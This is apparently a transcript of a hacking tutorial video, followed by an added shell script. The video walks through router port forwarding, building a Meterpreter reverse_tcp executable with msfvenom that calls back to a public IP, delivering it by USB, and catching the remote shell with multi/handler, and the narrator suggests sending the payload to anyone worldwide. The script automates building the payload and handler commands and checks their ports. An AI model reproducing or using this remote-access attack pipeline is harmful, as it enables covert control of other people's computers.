Hello everybody and welcome back. Now in the previous videos we have seen some of the post-exploitation modules that we can run against the target. Now those are just some of them. You can run basically a bunch of others as well, which we will not cover, since there is no time for that. If you want to, you can check them out in the Metasploit modules directory. Or you can just search for post in the Metasploit Framework console. If you just open it right here with this... I will open it, since we will need it, since in this video I will show you how you can do the attack over the Internet. But before I do that, let me just show you how you can search all of the post-exploitation modules. Now basically once this opens you just search post/windows, and it will give you all of the post-exploitation modules that you can use on Windows. So just type here search post/windows and it should print out all of the, let me just zoom it out once again, all of the modules that you can use on Windows. These are all post-exploitation modules, as it says right here with post, and you can use them if you want to. For example, this could be interesting to you if you wanted to check out the USB history. So we, for example, know that the USB that we plugged in before should appear in there.
Now I don't have a session open so I won't be running that exploit, but you can check it out if you want to. But more about that later on. What we want to do right now is perform our port forwarding in order to be able to do this attack on any PC in the world. So, how do we do port forwarding? Well, open up your Firefox. You will need to access your router, so you need to know your router's username and password and enter it. And after you do that, basically, you can just find the port forwarding section, so let me just show you. You just enter your router's IP, in my case my router's IP is .1.1, and I just click on it. It will prompt me with a login screen, so I just type my username and password. We do not want to save it. And now since everyone's router is different, what you want to find in your router is basically the port forwarding section. Now I'm not even sure where it is in mine. It should be somewhere in the, not wireless, it could be in the NAT. So NAT port forwarding, I found mine. And here you have a set of rules that you want to specify in order to perform port forwarding. So rule index, not really that important. Application, not important. What is important is the, well this isn't really... no, not this thing. The protocol under that is important. So you want to set TCP right here. The start port number you want to set to the port that you want to forward.
So let's say we want to forward 5555, and the end port number should also be 5555. Local IP address is the IP address of your Kali Linux machine, which currently, if I run ifconfig, is, let me just find it... is .1.4. So, you just type here your local IP address, you check it out with the ifconfig command, and then you specify it in the local IP address. Then the start port local can also be 5555, since these are the same options as the previous ones, which are the start and the end port. So once you select the port number that you want to port forward on your local machine, and the IP address of your local machine as we can see right here, what you want to click on is submit, or basically whatever it says for you. So once we submit we can see that right now I successfully made the port forward for this IP address on this port, which is good. Right now that we port forwarded it, the only thing you want to do right now, which is different from the previous attacks, is basically change the IP address of the local host in the MSFvenom payload creation into the global IP address. Or basically into your public IP address right here. So if you just type here "what is my IP", it will print out what your public IP address is. As it says right here, which currently for me is this one.
And the only thing you need to do is specify in your payload creation, instead of the LHOST being your local IP address, which is .1.4, you want to specify this IP address right here. So let me show you how to do that. If you just go right here, change to root, we check the working directory and we create the payload. So, msfvenom -p, we want to use the same payload as before, so meterpreter/reverse_tcp. And right here LHOST=, instead of specifying the local IP address, what we want to paste is your public IP address right here. The LPORT, you want to set the LPORT to the port that you forwarded, which in our case is 5555. In your case, if you specified a different port, just use the different port instead. So LPORT=5555, and then after that we specify everything the same. So -f exe, and then we want to specify it to be, let's say, mine shall be wanshell.exe. So we wait for this to create our payload. And after it creates this payload, what you can do is, basically, you can send it to anyone you want. You can send it basically to a different continent on some other PC. And what that PC will do is it will perform a public IP connection, and it will try to connect to this IP on this port. And our router, since it has a rule that this port is forwarded to the .1.4 local IP address, will forward this connection to our Kali Linux machine.
So now if I type here ls we can see that the wanshell.exe is created, and all I want to do is plug in my USB drive. So, Kingston DataTraveler, or you can actually do it over Apache2 if you want to. It doesn't really matter. And what I want to do is cp wanshell.exe... we'll just do it like this. Since I need to specify it in a regular terminal, so what I want to do is basically copy wanshell.exe onto my USB drive. You can do it manually or you can do it with a command like this. And now we have our wanshell here. So, after we do that we just turn off the USB drive, we unmount it. We also uncheck it right here so it goes to connect to our Windows 10 machine. And after that what we want to do, let me just see if it will pop up right here or if I have to replug it. So let me do it like this. It is not popping up, it doesn't matter. What we will do is we will just go right here, and here is the wanshell. I put it on my desktop, and what I want to do is basically specify a listener right now. Same as before. So we use, use exploit/multi/handler, set payload to windows/x64/meterpreter/reverse_tcp. Now I'm going over this fast since I already covered it. Whoops, I made a typo. And now show options. We can see everything is set except the LHOST. So, set LHOST to be your local IP address right here. And what you want to do is just type here exploit -j -z.
It will run it in the background. And if we run this right here, you will see that in a few seconds we will get a reverse shell back. Oops, the reason why we are not getting it, I just noticed right now, is because I specified right here the LPORT to be 4444, instead of it being 5555, which is specified in the port forwarding rules. So let us do this once again. Use exploit/multi/handler. Let me just see jobs. So I kill this job that I ran, so I killed the first one listening on port 4444. And I show my options. Let's see if everything is set, and now we want to change the LPORT to be 5555. So, now that we did all that, now we can exploit -j -z. We can run the meterpreter, or pardon me, run the listener, and now if we run this we get the connection from our Windows 10 machine. And now this will work for any machine in the world. So, basically, wherever that machine is it will be able to connect to you, since we port forwarded our port on the router. And we can see right now we are not even getting the connection from a local IP, we are getting the connection from the public IP. As we can see if I go sessions -i 1, getuid, we can see that we successfully were able to exploit a target machine that is not on our local network. Even though my Windows 10 machine really is, but the process is looking like this.
So with this process you will be able to connect to any machine in the world. So that would be about it for this tutorial. I hope you enjoyed it and I hope I see you in the next one. Bye!
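The procedure the video walks through has three values that must agree: the port forwarded on the router, the LPORT baked into the msfvenom payload, and the LPORT of the multi/handler. The video itself shows what happens when they drift (the handler was left on 4444 while 5555 was forwarded, so no session came back), and a second classic mistake is leaving an RFC 1918 address in the payload's LHOST, which an Internet host can never reach. The POSIX sh script below is an added example, not code from the video or from the Metasploit project. It derives the msfvenom command line and an msfconsole resource script from one set of parameters and checks them before anything is sent. Assumed values that are not in the video: the public IP 203.0.113.10 (a documentation-range address standing in for the one shown on screen), the Kali LAN address 192.168.1.4 (the video only shows ".1.4"), and the full payload name windows/x64/meterpreter/reverse_tcp, which the video uses for the handler but does not show in full for the msfvenom step.

```shell
#!/bin/sh
# Added example (not from the video): keep the router's forwarded port, the
# payload LPORT and the handler LPORT consistent, and refuse a private
# address as the public LHOST. Assumed values: public IP 203.0.113.10,
# LAN IP 192.168.1.4, payload windows/x64/meterpreter/reverse_tcp.

PAYLOAD="windows/x64/meterpreter/reverse_tcp"

# Returns 0 when the dotted-quad address is loopback or in an RFC 1918
# private range (10/8, 172.16/12, 192.168/16). Such an address in the
# payload's LHOST means a target on the Internet could never reach us.
is_private_ip() {
    case "$1" in
        10.*|192.168.*|127.*) return 0 ;;
        172.*)
            second=$(printf '%s' "$1" | cut -d. -f2)
            [ "$second" -ge 16 ] && [ "$second" -le 31 ] && return 0
            return 1 ;;
        *) return 1 ;;
    esac
}

# A port is a plain number in 1..65535.
is_valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Prints the msfvenom command line for a payload that calls back to the
# public address on the forwarded port. Arguments: public_ip port outfile.
build_payload_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' "$PAYLOAD" "$1" "$2" "$3"
}

# Prints an msfconsole resource script for the matching handler. The handler
# binds to the Kali box's LAN address (the router translates the public port
# to it), but its LPORT must equal the forwarded port, not the default 4444.
# Arguments: lan_ip port.
build_handler_rc() {
    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$PAYLOAD"
    printf 'set LHOST %s\n' "$1"
    printf 'set LPORT %s\n' "$2"
    printf 'exploit -j -z\n'
}

# Validates the whole setup; prints "ok" or the first problem found and
# returns 1 on any mismatch. Arguments:
#   public_ip lan_ip forwarded_port payload_lport handler_lport
check_setup() {
    public_ip=$1; lan_ip=$2; fwd_port=$3; payload_port=$4; handler_port=$5
    if is_private_ip "$public_ip"; then
        echo "LHOST $public_ip is a private address; use the public IP"; return 1
    fi
    if ! is_private_ip "$lan_ip"; then
        echo "router rule target $lan_ip is not a LAN address"; return 1
    fi
    is_valid_port "$fwd_port" || { echo "bad forwarded port $fwd_port"; return 1; }
    if [ "$payload_port" != "$fwd_port" ]; then
        echo "payload LPORT $payload_port != forwarded port $fwd_port"; return 1
    fi
    if [ "$handler_port" != "$fwd_port" ]; then
        echo "handler LPORT $handler_port != forwarded port $fwd_port"; return 1
    fi
    echo "ok"
}

# Usage with the assumed values. The last call reproduces the mistake from
# the video: handler left on 4444 while 5555 was forwarded on the router.
main() {
    check_setup 203.0.113.10 192.168.1.4 5555 5555 5555
    build_payload_cmd 203.0.113.10 5555 wanshell.exe
    build_handler_rc 192.168.1.4 5555
    check_setup 203.0.113.10 192.168.1.4 5555 5555 4444 || echo "fix the handler before sending the payload"
}

main
```

Redirect the output of build_handler_rc to a file and start it with msfconsole -r handler.rc so the handler is created from the same parameters as the payload; the only thing left to check by hand is that the router rule really points at the Kali box's current LAN address, which changes if DHCP hands out a different lease.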